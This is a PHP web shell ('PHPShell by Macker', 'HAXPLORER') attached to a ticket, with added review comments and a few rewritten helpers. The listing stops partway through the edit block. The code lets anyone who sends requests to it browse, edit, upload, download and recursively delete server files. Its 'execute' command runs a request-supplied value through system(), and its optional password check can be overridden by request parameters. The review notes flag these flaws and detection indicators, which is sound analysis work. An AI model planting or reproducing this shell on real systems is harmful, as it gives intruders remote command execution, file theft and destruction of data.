Ticket #96: phpshell.php

File phpshell.php, 37.2 KB (added by anonymous, 18 years ago)
1<?php
2
3/*
4*****************************************************************************************
5* PHPSHELL.PHP BY MACKER 30 March 2003 *
6*****************************************************************************************
7* *
8* Welcome to Macker's PHPShell script... *
9* This script will allow you to browse webservers etc... *
10* Just copy the file to your directory and open it in your Internet Browser. *
11* *
12* The webserver should support PHP... *
13* *
14* You can modify the script if you want, but please send me a copy to: *
15* DRAZZ01@HOTMAIL.COM *
16*****************************************************************************************
17
18!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
19!! PLEASE NOTE: You should use this script at your own risk, it could do damage to the !!
20!! Sites or even the server... You are responsible for your own deeds. !!
21!! The admin of your webserver should always know you are using this !!
22!! script. !!
23!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
24*/
25
26
27/*Setting some environment variables...*/
28
$SFileName=$PHP_SELF; /* Self-URL: used as the target of every link and form action in this file.
   Original author's note: added to ensure the script runs correctly; enter the
   script's filename in this variable.
   NOTE(review): nothing visible in this listing assigns $PHP_SELF, so it is
   presumably expected from register_globals-style importing; the request-to-global
   copy further down runs after this line. Confirm what value it holds at runtime.

   Original author's note: uncomment the two following variables if you want to
   use HTTP authentication; this will password-protect PHPShell.
   NOTE(review): no such assignments follow in this listing. $http_auth_user and
   $http_auth_pass are only read (in the HTTP AUTHENTICATION check), so this copy
   has authentication switched off unless they are defined elsewhere. */
34
/* Copy every non-array value of $array into a global variable named after its key.
   Nested arrays are walked recursively; the outer key is dropped, so only the
   innermost key name becomes a variable.

   NOTE(review): this re-creates register_globals by hand. Called on request
   arrays, it lets a request create or overwrite any global in this file, so no
   variable used later can be assumed to hold a value set by the script itself.
   NOTE(review): each() was deprecated in PHP 7.2 and removed in PHP 8.0. */
function walkArray($array){
    while (list($key, $data) = each($array)) {
        if (is_array($data)) {
            /* descend; the parent key is not carried along */
            walkArray($data);
        }
        else {
            /* variable-variable: the key chooses which global is written */
            global $$key;
            $$key = $data;
        }
    }
}
/* Import request parameters as globals. Order matters: POST is applied last,
   so a POST value replaces a GET value of the same name.
   NOTE(review): $_PUT is not a PHP superglobal and is not assigned anywhere in
   this listing, so the first call presumably never runs. */
if (isset($_PUT)) walkArray($_PUT);
if (isset($_GET)) walkArray($_GET);
if (isset($_POST)) walkArray($_POST);

/* Turns off all PHP error reporting for the rest of the request, so failed
   file and command operations produce no PHP diagnostics. */
error_reporting(0);
$PHPVer=phpversion();
/* Only the first character of the version string is inspected. */
$isGoodver=(intval($PHPVer[0])>=4);
/* Fixed banner strings. They are printed verbatim in the HTML comment and the
   header row of every rendered page, which makes them usable as indicators
   when scanning web roots or HTTP responses for this script. */
$scriptTitle = "PHPShell";
$scriptident = "$scriptTitle by Macker";

/* Paging defaults; both names can also arrive from the request via walkArray(). */
if (empty($Pmax))
    $Pmax = 50; /* Identifies the max amount of Directories and files listed on one page */
if (empty($Pidx))
    $Pidx = 0;

/* Separator normalisation only: "\\\\" -> "\\", "//" -> "/", then "\\" -> "/".
   NOTE(review): nothing here confines $dir or $file to a base directory or
   rejects ".." segments; both come straight from the request. */
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));

$scriptdate = "30 march 2003";
$scriptver = "Version 2.6.3dev";
/* Icon lookup: action name => image file expected under $LOCAL_IMAGE_DIR. */
$LOCAL_IMAGE_DIR = "img";
$REMOTE_IMAGE_URL = "img";
$img = array(
    "Edit" => "edit.JPG",
    "Download" => "download.JPG",
    "Upload" => "upload.JPG",
    "Delete" => "delete.JPG",
    "View" => "view.JPG",
    "Rename" => "rename.JPG",
    "Move" => "move.JPG",
    "Copy" => "copy.JPG",
    "Execute" => "exec.JPG"
    );

/* Replace each file name with an <img> tag when the icon exists on disk,
   otherwise with a plain "[Action]" text label.
   NOTE(review): each() was removed in PHP 8.0. */
while (list($id, $im)=each($img))
    if (file_exists("$LOCAL_IMAGE_DIR/$im"))
        $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
    else
        $img[$id] = "[$id]";
85
86
87/* HTTP AUTHENTICATION */
88
/* Gate: send an HTTP Basic challenge and stop when either
     (a) both $http_auth_user and $http_auth_pass are set AND the supplied
         credentials are missing or do not match, or
     (b) $logoff == 1 and $noauth == "yes" (forces a fresh challenge).
   If neither holds, execution falls through and every command below is reachable.
   NOTE(review): every variable read here is a plain global, and walkArray() has
   already copied request parameters into globals, so the values compared may
   originate from the request itself. Do not treat this as a real access control.
   NOTE(review): the stored secret is an unsalted MD5 hex digest, compared with
   a loose != instead of hash_equals(). */
if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || md5($PHP_AUTH_PW) != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) {
    setcookie("noauth","");
    Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\"");
    Header( "HTTP/1.0 401 Unauthorized");
    echo "Your username or password is incorrect";
    /* NOTE(review): the 401 body also carries the MD5 of whatever password was
       submitted, presumably as a setup aid for producing the configured hash. */
    echo "\n\n" . md5($PHP_AUTH_PW);
    exit ;

}
98
/* Return $instr with every space replaced by the HTML entity "&nbsp;".
   No other character is escaped. */
function spacetonbsp($instr)
{
    $plainSpace = " ";
    $entity = "&nbsp;";
    $converted = str_replace($plainSpace, $entity, $instr);
    return $converted;
}
100
/* Recursively delete $Fdir.
   For a directory: remove every entry except "." and "..", then rmdir() the
   directory itself and return that result. For anything else: return unlink().
   Results of the recursive calls are ignored; only the final rmdir()/unlink()
   outcome reaches the caller.

   NOTE(review): the "deldir" command passes a request-supplied path here and
   nothing restricts it to a base directory.
   NOTE(review): is_dir() follows symbolic links, so a link to a directory is
   descended into and the link target's contents are removed.
   NOTE(review): a failed opendir() is not checked before readdir(), and the loop
   also ends early on an entry whose name is falsy (for example "0"). */
function Mydeldir($Fdir) {
    if (is_dir($Fdir)) {
        $Fh=@opendir($Fdir);
        while ($Fbuf = readdir($Fh))
            if (($Fbuf != ".") && ($Fbuf != ".."))
                Mydeldir("$Fdir/$Fbuf");
        @closedir($Fh);
        return rmdir($Fdir);
    } else {
        return unlink($Fdir);
    }
}
113
/* Render a byte count as "<number> <unit>".
   Starting in bytes, the value is stepped up through KB, MB, GB and TB for as
   long as it is greater than 1024. Each step truncates to an integer, divides
   by 1.024, truncates again and divides by 1000, which is roughly a division
   by 1024 kept to three decimals. */
function formatsize($insize) {
    $value = $insize;
    $unit = "B";
    $largerUnits = array("KB", "MB", "GB", "TB");
    foreach ($largerUnits as $nextUnit) {
        /* once the value is no longer above 1024 no later step can apply */
        if (!($value > 1024)) {
            break;
        }
        $scaled = intval(intval($value) / 1.024);
        $value = $scaled / 1000;
        $unit = $nextUnit;
    }
    return "$value $unit";
}
135
/* Page header: emitted for every command except "downl", which sends its own
   headers and raw file bytes instead of HTML.
   The HTML comment on the first output line and the banner row print
   $scriptident, $scriptver and $scriptdate verbatim; together with the request
   for img/repeat.bmp they are practical indicators when reviewing web roots,
   HTTP responses or access logs for this script.
   NOTE(review): $SFileName is echoed into <TITLE> without htmlspecialchars().
   Request parameters are copied into globals earlier in the file, so treat the
   value as request-influenced. */
if ($cmd != "downl") {
 ?>

<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?> -->
<HTML>
 <HEAD>
 <STYLE>
 <!--
 A{ text-decoration:none; color:navy; font-size: 12px }
 body { font-size: 12px;
 background-image: url(img/repeat.bmp);
 scrollbar-width: 5;
 scrollbar-face-color: silver;
 scrollbar-shadow-color: gray;
 scrollbar-highlight-color: white;
 scrollbar-3dlight-color:black;
 scrollbar-darkshadow-color: black;
 scrollbar-track-color:#dddddd;
 scrollbar-arrow-color: black;
 }
 Table { font-size: 12px; }
 TR{ font-size: 12px; }
 TD{ font-size: 12px; BORDER-LEFT: black 0px solid; BORDER-RIGHT: black 0px solid; BORDER-TOP: black 0px solid; BORDER-BOTTOM: black 0px solid; COLOR: black; }
 .border{ BORDER-LEFT: black 1px solid;
 BORDER-RIGHT: black 1px solid;
 BORDER-TOP: black 1px solid;
 BORDER-BOTTOM: black 1px solid;
 }
 .none { BORDER-LEFT: black 0px solid;
 BORDER-RIGHT: black 0px solid;
 BORDER-TOP: black 0px solid;
 BORDER-BOTTOM: black 0px solid;
 }
 .inputtext {
 background-color: #EFEFEF;
 border: 1px solid #000000;
 height: 20;
 }
 .inputbutton {
 background-color: silver;
 border: 1px solid #000000;
 border-width: 1px;
 height: 20;
 }
 .white {
 background-color: #FFFFFF;
 }
 .inputtextarea {
 background-color: #EFEFEF;
 border: 1px solid #000000;
 scrollbar-width: 5;
 scrollbar-height: 5;
 scrollbar-face-color: #EFEFEF;
 scrollbar-shadow-color: silver;
 scrollbar-highlight-color: #EFEFEF;
 scrollbar-3dlight-color:silver;
 scrollbar-darkshadow-color: silver;
 scrollbar-track-color: #EFEFEF;
 scrollbar-arrow-color: black;
 }
 .top { BORDER-TOP: black 1px solid; }
 .textin { BORDER-LEFT: silver 1px solid;
 BORDER-RIGHT: silver 1px solid;
 BORDER-TOP: silver 1px solid;
 BORDER-BOTTOM: silver 1px solid;
 width: 99%; font-size: 12px; font-weight: bold; color: navy;
 }
 .notop { BORDER-TOP: black 0px solid; }
 .bottom { BORDER-BOTTOM: black 1px solid; }
 .nobottom { BORDER-BOTTOM: black 0px solid; }
 .left { BORDER-LEFT: black 1px solid; }
 .noleft { BORDER-LEFT: black 0px solid; }
 .right { BORDER-RIGHT: black 1px solid; }
 .noright { BORDER-RIGHT: black 0px solid; }
 .silver{ BACKGROUND: silver; }
 -->
 </STYLE>
 <TITLE><?php echo $SFileName ?></TITLE>
 </HEAD>
 <body bottommargin="0" rightmargin="0" topmargin="0" leftmargin="0">
 <table width=100% height="100%" NOWRAP border="0">
 <tr NOWRAP>
 <td width="100%" NOWRAP>
 <table NOWRAP width=100% height="100%" border="0" cellpadding="0" cellspacing="0">
 <tr>
 <td width="100%" height="15" class="silver border">
 <center>
 <strong>
 <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font>
 </strong>
 </center>
 </td>
 </tr>
 <tr><td valign="middle"><br>

 <?php
}
233
234if ( $cmd=="dir" ) {
235 $h=@opendir($dir);
236 if ($h == false) {
237 echo "<br><font color=\"red\">&nbsp;&nbsp;&nbsp;\n\n\n\n
238 COULD NOT OPEN THIS DIRECTORY!!!<br>&nbsp;&nbsp;&nbsp;\n
239 THE SCRIPT WILL RESULT IN AN ERROR!!!
240 <br><br>&nbsp;&nbsp;&nbsp;\n
241 PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR...
242 <br><br></font>\n\n\n\n";
243 }
244 if (function_exists('realpath')) {
245 $partdir = realpath($dir);
246 }
247 else {
248 $partdir = $dir;
249 }
250 if (strlen($partdir) >= 100) {
251 $partdir = substr($partdir, -100);
252 $pos = strpos($partdir, "/");
253 if (strval($pos) != "") {
254 $partdir = "<-- ...".substr($partdir, $pos);
255 }
256 $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
257 $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
258 $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
259 }
260 ?>
261 <form name="urlform" action="<?php echo $SFileName ?>"><input type="hidden" name="cmd" value="dir">
262 <table class="white" NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
263 <tr>
264 <td width="100%" class="silver border">
265 <center>&nbsp;HAXPLORER - Server Files Browser...&nbsp;</center>
266 </td>
267 </tr>
268 </table>
269 <br>
270 <table class="white" width="100%" border="0" cellpadding="0" cellspacing="0">
271 <tr>
272 <td class="border nobottom noright">
273 &nbsp;Browsing:&nbsp;
274 </td>
275 <td width="100%" class="border nobottom noleft">
276 <table width="100%" border="0" cellpadding="1" cellspacing="0">
277 <tr>
278 <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
279 <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GO<b></a>&nbsp;<center></td>
280 </tr>
281 </table>
282
283 </td>
284 </tr>
285 </table>
286 <!-- </form> -->
287 <table class="white" NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
288 <tr>
289 <td width="100%" NOWRAP class="silver border">
290 &nbsp;Filename&nbsp;
291 </td>
292 <td NOWRAP class="silver border noleft">
293 &nbsp;Actions&nbsp;(Attempt to perform)&nbsp;
294 </td>
295 <td NOWRAP class="silver border noleft">
296 &nbsp;Size&nbsp;
297 </td>
298 <td width=1 NOWRAP class="silver border noleft">
299 &nbsp;Attributes&nbsp;
300 </td>
301 <td NOWRAP class="silver border noleft">
302 &nbsp;Modification Date&nbsp;
303 </td>
304 <tr>
305 <?php
306
307
308 /* <!-- This whole heap of junk is the sorting section... */
309
310 $dirn = array();
311 $filen = array();
312 $filesizes = 0;
313 while ($buf = readdir($h)) {
314 if (is_dir("$dir/$buf"))
315 $dirn[] = $buf;
316 else {
317 $size = @filesize("$dir/$buf");
318 If ($size != false) {
319 $filesizes = $filesizes + $size;
320 }
321 $filen[] = $buf;
322 } }
323 $dirno = count($dirn) + 1;
324 $fileno = count($filen) + 1;
325
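/* Case-insensitive comparator used as the usort() callback for the directory
   and file name lists. Returns -1, 0 or 1.
   Names that differ only in letter case used to compare as "greater" in both
   directions, which gives usort() an inconsistent ordering; they are now
   ordered by a plain strcmp() so the result is antisymmetric. */
function mycmp($a, $b){
    if ($a == $b) return 0;
    $lowerA = strtolower($a);
    $lowerB = strtolower($b);
    if ($lowerA === $lowerB) {
        /* case-only difference: deterministic tie-break on the raw names */
        return (strcmp($a, $b) < 0) ? -1 : 1;
    }
    return ($lowerA < $lowerB) ? -1 : 1;
}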
330
331 if (function_exists("usort")) {
332 usort($dirn, "mycmp");
333 usort($filen, "mycmp");
334 }
335 else {
336 sort ($dirn);
337 sort ($filen);
338 }
339 reset ($dirn);
340 reset ($filen);
341 if (function_exists('array_merge')) {
342 $filelist = array_merge ($dirn, $filen);
343 }
344 else {
345 $filelist = $dirn + $filen;
346 }
347
348
349 if ( count($filelist)-1 > $Pmax ) {
350 $from = $Pidx * $Pmax;
351 $to = ($Pidx + 1) * $Pmax-1;
352 if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
353 $to = count($filelist) - 1;
354 if ($to > count($filelist)-1)
355 $to = count($filelist)-1;
356 $Dcontents = array();
357 For ($Fi = $from; $Fi <= $to; $Fi++) {
358 $Dcontents[] = $filelist[$Fi];
359 }
360
361 }
362 else {
363 $Dcontents = $filelist;
364 }
365
366 while (list ($key, $file) = each ($Dcontents)) {
367 if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
368 /* <!-- Dirname --> */
369 echo "<tr><td NOWRAP class=\"top left right\">&nbsp;&nbsp;&nbsp;<a href=\"$SFileName?cmd=dir&dir=$dir/$file\">[$file]</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>\n";
370 /* <!-- Actions --> */
371 echo "<td NOWRAP class=\"top right\"><center>&nbsp;&nbsp;\n";
372 /* <!-- Rename --> */
373 if ( ($file != ".") && ($file != "..") )
374 echo "<a href=\"$SFileName?cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file\">".$img["Rename"]."</a>&nbsp;&nbsp;&nbsp;\n";
375 /* <!-- Delete --> */
376 if ( ($file != ".") && ($file != "..") )
377 echo "&nbsp;&nbsp;&nbsp;<a href=\"$SFileName?cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir\">".$img["Delete"]."</a>\n";
378 /* <!-- End of Actions --> */
379 echo "&nbsp;&nbsp;</center></td>\n";
380 /* <!-- Size --> */
381 echo "<td NOWRAP class=\"top right\">&nbsp;</td>\n";
382 /* <!-- Attributes --> */
383 echo "<td NOWRAP class=\"top right\">&nbsp;&nbsp;\n";
384 echo "<strong>D</strong>";
385 if ( @is_readable("$dir/$file") ) {
386 echo "<strong>R</strong>";
387 }
388 if (function_exists('is_writeable')) {
389 if ( @is_writeable("$dir/$file") ) {
390 echo "<strong>W</stong>";
391 }
392 }
393 else {
394 echo "<strong>(W)</stong>";
395 }
396 if ( @is_executable("$dir/$file") ) {
397 echo "<Strong>X<strong>";
398 }
399 echo "&nbsp;&nbsp;</td>\n";
400 /* <!-- Date --> */
401 echo "<td NOWRAP class=\"top right\" NOWRAP>\n";
402 echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
403 echo "</td>";
404 echo "</tr>\n";
405
406 }
407 else { /* <!-- Then it must be a File... --> */
408 /* <!-- Filename --> */
409 if ( @is_readable("$dir/$file") )
410 echo "<tr><td NOWRAP class=\"top left right\">&nbsp;&nbsp;&nbsp;<a href=\"$SFileName?cmd=file&file=$dir/$file\">$file</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>\n";
411 else
412 echo "<tr><td NOWRAP class=\"top left right\">&nbsp;&nbsp;&nbsp;$file&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>\n";
413 /* <!-- Actions --> */
414 echo "<td NOWRAP class=\"top right\"><center>&nbsp;&nbsp;\n";
415 /* <!-- Rename --> */
416 echo "<a href=\"$SFileName?cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file\">".$img["Rename"]."</a>&nbsp;&nbsp;&nbsp;\n";
417 /* <!-- Edit --> */
418 if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
419 echo "<a href=\"$SFileName?cmd=edit&file=$dir/$file\">".$img["Edit"]."</a>&nbsp;&nbsp;&nbsp;\n";
420 /* <!-- Copy --> */
421 echo "<a href=\"$SFileName?cmd=copy&file=$dir/$file\">".$img["Copy"]."</a>\n";
422 /* <!-- Move --> */
423 if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
424 echo "&nbsp;&nbsp;&nbsp;<a href=\"$SFileName?cmd=move&file=$dir/$file\">".$img["Move"]."</a>\n";
425 /* <!-- Delete --> */
426 echo "&nbsp;&nbsp;&nbsp;<a href=\"$SFileName?cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir\">".$img["Delete"]."</a>\n";
427 /* <!-- Download --> */
428 echo "&nbsp;&nbsp;&nbsp;<a href=\"$SFileName?cmd=downl&file=$dir/$file\">".$img["Download"]."</a>\n";
429 /* <!-- Execute --> */
430 if ( @is_executable("$dir/$file") )
431 echo "&nbsp;&nbsp;&nbsp;<a href=\"$SFileName?cmd=execute&file=$dir/$file\">".$img["Execute"]."</a>\n";
432 /* <!-- End of Actions --> */
433 echo "&nbsp;&nbsp;</center></td>\n";
434 /* <!-- Size --> */
435 echo "<td NOWRAP align=\"right\" class=\"top right\" NOWRAP >\n";
436 $size = @filesize("$dir/$file");
437 If ($size != false)
438 echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
439 else
440 echo "&nbsp;&nbsp;<strong>0 B<strong>";
441 echo "&nbsp;&nbsp;</td>\n";
442
443 /* <!-- Attributes --> */
444 echo "<td NOWRAP class=\"top right\">&nbsp;&nbsp;\n";
445
446 if ( @is_readable("$dir/$file") )
447 echo "<strong>R</strong>";
448 if ( @is_writeable("$dir/$file") )
449 echo "<strong>W</stong>";
450 if ( @is_executable("$dir/$file") )
451 echo "<Strong>X<strong>";
452 if (function_exists('is_uploaded_file')){
453 if ( @is_uploaded_file("$dir/$file") )
454 echo "<Strong>U<strong>";
455 }
456 else {
457 echo "<Strong>(U)<strong>";
458 }
459 echo "&nbsp;&nbsp;</td>\n";
460 /* <!-- Date --> */
461 echo "<td NOWRAP class=\"top right\" NOWRAP>\n";
462 echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
463 echo "</td>";
464 echo "</tr>\n";
465 }
466 }
467
468 echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
469 echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Dir(s),&nbsp;".@count ($filen)."&nbsp;File(s)&nbsp;&nbsp;\n";
470 echo "</td><td NOWRAP class=\"silver border noleft\">\n";
471 echo "&nbsp;&nbsp;Total filesize:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
472
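/* Print one pager entry "| a - b |", wrapped in a link when $link is non-empty.
   $a and $b are fragments of file names taken from the directory listing and
   $link is built from request values, so all three are HTML-escaped before
   being written into the page. */
function printpagelink($a, $b, $link = ""){
    $from = htmlspecialchars($a, ENT_QUOTES);
    $to = htmlspecialchars($b, ENT_QUOTES);
    if ($link != "")
        echo "<A HREF=\"" . htmlspecialchars($link, ENT_QUOTES) . "\"><b>| $from - $to |</b></A>";
    else
        echo "<b>| $from - $to |</b>";
}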
479
480 if ( count($filelist)-1 > $Pmax ) {
481 echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
482 $Fi = 0;
483 while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
484 $from = $Fi*$Pmax;
485 while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
486 $to = ($Fi + 1) * $Pmax - 1;
487 if ($Fi == $Pidx)
488 $link="";
489 else
490 $link="$SFilename?cmd=$cmd&dir=$dir&Pidx=$Fi";
491 printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
492 echo "&nbsp;&nbsp;&nbsp;";
493 $Fi++;
494 }
495 $from = $Fi*$Pmax;
496 while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
497 $to = count($filelist)-1;
498 if ($Fi == $Pidx)
499 $link="";
500 else
501 $link="$SFilename?cmd=$cmd&dir=$dir&Pidx=$Fi";
502 printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
503
504
505 echo "</center></td></tr></table></td></tr>";
506 }
507
508
509 echo "</table>\n<br><table NOWRAP>";
510
511 if ($isGoodver) {
512 echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
513 }
514 else {
515 echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
516 }
517 /* <!-- Other Actions --> */
518 echo "<tr><td class=\"silver border\">&nbsp;<strong>Other actions:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
519 echo "<td>&nbsp;<b><a href=\"$SFileName?cmd=newfile&lastcmd=dir&lastdir=$dir\">| New File |</a>\n&nbsp;&nbsp;&nbsp;<a href=\"$SFileName?cmd=newdir&lastcmd=dir&lastdir=$dir\">| New Directory |</a>\n&nbsp;&nbsp;&nbsp;<a href=\"$SFileName?cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir\">| Upload a File |</a></b>\n</td></tr>\n";
520 echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
521 echo "<tr><td class=\"silver border\">&nbsp;<strong>Your IP:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
522 echo "<tr><td class=\"silver border\">&nbsp;<strong>Browsing Directory:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
523 echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Legend:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
524 echo "<table NOWRAP>";
525 echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Directory.</td></tr>\n";
526 echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Readable.</td></tr>\n";
527 echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Writeable.</td></tr>\n";
528 echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Executable.</td></tr>\n";
529 echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
530 echo "</table></td>";
531 echo "</table>";
532 echo "<br>";
533 @closedir($h);
534 }
535 elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
536 echo system("$file");
537 }
538elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
539 echo "<center><table><tr><td NOWRAP>" ;
540 if ($auth == "yes") {
541 if (Mydeldir($file)==false) {
542 echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
543 }
544 else {
545 echo "Successfully removed \"$file\"<br>";
546 }
547 echo "<form action=\"$SFileName\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
548 }
549 else {
550 echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
551 <form action=\"$SFileName\" method=\"POST\">
552 <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
553 <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
554 <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
555 <input type=\"hidden\" name=\"file\" value=\"$file\">
556 <input type=\"hidden\" name=\"auth\" value=\"yes\">
557 <input type=\"submit\" value=\"Yes\"></form>
558 <form action=\"$SFileName\" method=\"POST\">
559 <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
560 <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
561 <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
562 }
563 echo "</td></tr></center>";
564}
565 elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */ echo "<center><table><tr><td NOWRAP>" ;
566 if ($auth == "yes") {
567 if (@unlink($file)==false) {
568 echo "Could not remove \"$file\"<br>";
569 }
570 else {
571 echo "Successfully removed \"$file\"<br>";
572 }
573 echo "<form action=\"$SFileName\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
574 }
575 else {
576 echo "Are you sure you want to delete \"$file\" ?
577 <form action=\"$SFileName\" method=\"POST\">
578 <input type=\"hidden\" name=\"cmd\" value=\"delfile\">
579 <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
580 <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
581 <input type=\"hidden\" name=\"file\" value=\"$file\">
582 <input type=\"hidden\" name=\"auth\" value=\"yes\">
583
584 <input type=\"submit\" value=\"Yes\"></form>
585 <form action=\"$SFileName\" method=\"POST\">
586 <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
587 <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
588 <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
589 }
590 echo "</td></tr></center>";
591}
592elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
593 echo "<center><table><tr><td NOWRAP>";
594 $i = 1;
595 while (file_exists("$lastdir/newfile$i.txt"))
596 $i++;
597 $file = fopen("$lastdir/newfile$i.txt", "w+");
598 if ($file == false)
599 echo "Could not create the new file...<br>";
600 else
601 echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
602 echo "
603 <form action=\"$SFileName\" method=\"POST\">
604 <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
605 <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
606 <input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
607 </form></center>
608 </td></tr></table></center> ";
609 }
610elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
611 echo "<center><table><tr><td NOWRAP>" ;
612 $i = 1;
613 while (is_dir("$lastdir/newdir$i"))
614 $i++;
615 $file = mkdir("$lastdir/newdir$i", 0777);
616 if ($file == false)
617 echo "Could not create the new directory...<br>";
618 else
619 echo "Successfully created: \"$lastdir/newdir$i\"<br>";
620 echo "<form action=\"$SFileName\" method=\"POST\">
621 <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
622 <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
623 <input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
624 </form></center></td></tr></table></center>";
625}
626elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
627 $contents = "";
628 $fc = @file( $file );
629 while ( @list( $ln, $line ) = each( $fc ) ) {
630 $contents .= htmlentities( $line ) ;
631 }
632 echo "<br><center><table><tr><td NOWRAP>";
